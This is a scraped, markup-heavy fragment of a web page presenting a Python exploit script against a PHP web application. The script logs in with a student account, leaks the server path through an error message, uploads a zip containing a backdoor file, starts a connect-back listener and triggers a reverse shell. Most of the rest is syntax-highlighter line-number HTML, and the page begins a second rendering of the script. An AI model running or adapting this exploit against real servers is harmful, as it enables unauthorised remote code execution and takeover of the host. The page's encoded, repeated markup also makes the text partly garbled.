&#8216;submit&#8217;: (None, &#8216;Import&#8217;),         }      proxies = {&#8220;http&#8221;:&#8221;http:\/\/127.0.0.1:8080&#8243;}      r = s.post(&#8220;http:\/\/%s\/home\/ims\/ims_import.php&#8221; % target, files=multiple_files, allow_redirects=False, proxies=proxies)            if r.status_code == 302:          return True      return False        def _clean_up():      os.remove(&#8220;pwn.zip&#8221;)    def pop_shell():      &#8220;&#8221;&#8221;      pops a shell by making a request to the backdoor code      &#8220;&#8221;&#8221;      _clean_up()      try:          r = s.get(&#8220;http:\/\/%s\/home\/si.phtml&#8221; % target)      except:          pass    def we_can_get_fp():      &#8220;&#8221;&#8221;      gets the full path      requires some php.ini settings:      display_errors = On      &#8220;&#8221;&#8221;      global fp      r = s.get(&#8220;http:\/\/%s\/documentation\/index.php?p[]=&#8221; % target)      match = re.search(&#8220;array given in &lt;b&gt;\/(.*)documentation\/index.php&lt;\/b&gt; &#8220;, r.text)      if match:          fp = &#8220;\/%s&#8221; % match.group(1)          return True      return False              def validation_of_args_are_good():      &#8220;&#8221;&#8221;      validates where the arguments are good or not      &#8220;&#8221;&#8221;      global target, cb_host, cb_port, username, password, w_lst, help_str      help_str = &#8220;%s &lt;target&gt; &lt;author user:pass&gt; &lt;connectback host:port&gt;&#8221; % sys.argv[0]      if len(sys.argv) &lt; 4:          print help_str          sys.exit(1)      target    = sys.argv[1]      user_pass = sys.argv[2]      host_port = sys.argv[3]      if &#8220;:&#8221; not in host_port:          print &#8220;(-) your connectback host must be in &lt;host:port&gt; format&#8221;          return False      elif &#8220;:&#8221; not in user_pass:          print &#8220;(-) your student username and password must be in &lt;user:pass&gt; format&#8221;          return False      cb_port = host_port.split(&#8220;:&#8221;)[1]      cb_host = host_port.split(&#8220;:&#8221;)[0]      password = user_pass.split(&#8220;:&#8221;)[1]      username = user_pass.split(&#8220;:&#8221;)[0]      if not cb_port.isdigit():          print &#8220;(-) you need a port NUMBER for the command back host&#8221;          return False      elif not os.access(os.getcwd(), os.W_OK):          print &#8220;(-) dont have write access in current dir!&#8221;          return False      return True      def main():        global s      s = requests.Session()      banner()      if validation_of_args_are_good():          if we_can_login():              print &#8220;(+) logged in successfully&#8230;&#8221;              print &#8220;(+) finding full path&#8230;&#8221;              if we_can_get_fp():                  print &#8220;(!) found the path at: %s&#8221; % fp                  print &#8220;(+) uploading shell&#8230;&#8221;                  if we_can_upload_a_shell():                      print &#8220;(!) shell upload successful, launching!&#8221;                      instance = threaded_tcp_server((&#8220;0.0.0.0&#8221;, int(cb_port)), connect_back_shell)                      cbserver = threading.Thread(target=instance.serve_forever)                      cbserver.daemon = True                      cbserver.start()                      pop_shell()      else:          print help_str          sys.exit(-1)            if __name__ == &#8216;__main__&#8217;:      main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-179\">179<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-186\">186<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-187\">187<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-188\">188<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-189\">189<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-190\">190<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-191\">191<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-192\">192<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-193\">193<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-194\">194<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-195\">195<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-196\">196<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-197\">197<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-198\">198<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-199\">199<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-200\">200<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-201\">201<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-202\">202<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-203\">203<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-204\">204<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-205\">205<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-206\">206<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-207\">207<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-208\">208<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-209\">209<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-210\">210<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-211\">211<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-212\">212<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-213\">213<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-214\">214<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-215\">215<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-217\">217<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-218\">218<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-219\">219<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-220\">220<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-221\">221<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-222\">222<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-223\">223<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-224\">224<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-225\">225<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-226\">226<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-227\">227<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-228\">228<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-229\">229<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-230\">230<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-231\">231<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-232\">232<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-233\">233<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-234\">234<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-235\">235<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-236\">236<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-237\">237<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-238\">238<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-239\">239<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa1726489437-240\">240<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa1726489437-241\">241<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-1\"><span class=\"crayon-p\">#!\/usr\/local\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">re<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">time<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">select<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-t\">string<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">random<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">zipfile<\/span><\/div>\n<div class=\"crayon-line\" 